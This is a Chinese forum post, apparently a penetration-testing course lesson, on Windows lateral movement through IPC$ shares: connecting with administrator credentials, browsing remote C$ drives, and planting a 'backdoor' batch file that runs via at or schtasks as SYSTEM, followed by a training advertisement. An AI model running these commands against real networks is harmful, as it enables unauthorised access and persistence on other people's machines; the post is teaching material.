(一)内网横向移动-常用windows连接相关命令-建立IPC共享

[复制链接]
发表于 2025-9-12 11:28:11 | 显示全部楼层 |阅读模式
本章目标
1. 常用windows连接相关命令
2. Windows系统散列值获取分析
3. 哈希传递攻击分析aes hash(ntlm)tickets list
4. 票据传递攻击分析
5. PsExec的使用
6. Wmic的使用
7. Smbexec的使用
8. DCOM在远程系统中的使用
9. SPN在域环境中的应用

1、常用widows连接相关命令
1)、windows远程连接
mstsc    远程桌面
vnc       远程桌面
ipc       ipc$共享

2)、IPC利用条件:
1、开启了139、445端口
2、管理员开启了默认共享

3)、开启ipc共享
a:查看共享
  1. net share ipc$
复制代码
截图202509120332363599.png


b:建立共享
  1. net use \\192.168.159.200\ipc$ "ctf8.com" /user:administrator
复制代码
截图202509120726562995.png

c:查看共享
  1. net use
复制代码
截图202509120727564919.png

d:查看远程主机进程运行情况
  1. tasklist /s 192.168.159.200
复制代码
截图202509120731421934.png


e:查看远程主机当前时间
  1. net time \\192.168.159.200
复制代码

f:查看C盘下面共享的文件
  1. dir \\192.168.159.100\c$
复制代码
截图202509120745179512.png
g:查看C盘某个路径下的文件
  1. dir \\192.168.159.100\c$\Users\Administrator\Desktop
复制代码
截图202509120747596050.png

4)添加后门可执行程序

向远程主机定时任务添加后门
以windows7共计windows2003为例:
命令介绍:
  1. 1、创建bat文件 calc.bat:文件内容为 start calc.exe
  2. 2、copy calc.bat \\192.168.63.131\c$
  3. 3、at \\192.168.63.131 21:41 c:\calc.bat
复制代码
截图202509140543441936.png


查看windows2003的进程列表

截图202509140545439749.png

其他命令
  1. at \\192.168.159.154 14:56 cmd.exe /c "ipconfig>c:/111.txt"
复制代码
截图202509140658414480.png
截图202509140658561086.png
还可以使用:
  1. type \\192.168.159.154\c$\111.txt
复制代码


截图202509140659541236.png

如果是新版本操作系统,比如是windows2012,那么at命令给飞起,需要是用schtasks替代at添加计划任务命令:
  1. /create 创建 /s 远端 /tn任务名 /sc 计划类型 /tr执行内容 /ru 执行权限 /f强制
复制代码
创建一个任务,打开计算器
  1. schtasks /create /s 192.168.159.100 /tn test /sc onstart /tr calc.exe /ru system /f
复制代码

激活计划任务:
  1. schtasks /run /s 192.168.159.100 /tn "test"
复制代码

截图202509140707399094.png

删除计划任务:
  1. schtasks /delete /s 192.168.159.100 /tn "test" /f
复制代码

截图202509140708007643.png

删除ipc连接:
  1. net use \\192.168.63.131\ipc$ /del
复制代码


计划任务会产生日志,存储位置为:
  1. C:\windows\task\SchedLgU.txt
复制代码

必火网络安全培训,北京实地培训,月月有开班,零基础入门,四个月打造渗透高手。
详情请加微信:nvhack/153-2000-4362,手机微信同号。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|女黑客安全网 |网站地图 | 津ICP备17008032号-3

GMT+8, 2026-2-2 05:18 , Processed in 0.080352 second(s), 27 queries .

Powered by Discuz! X3.5

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表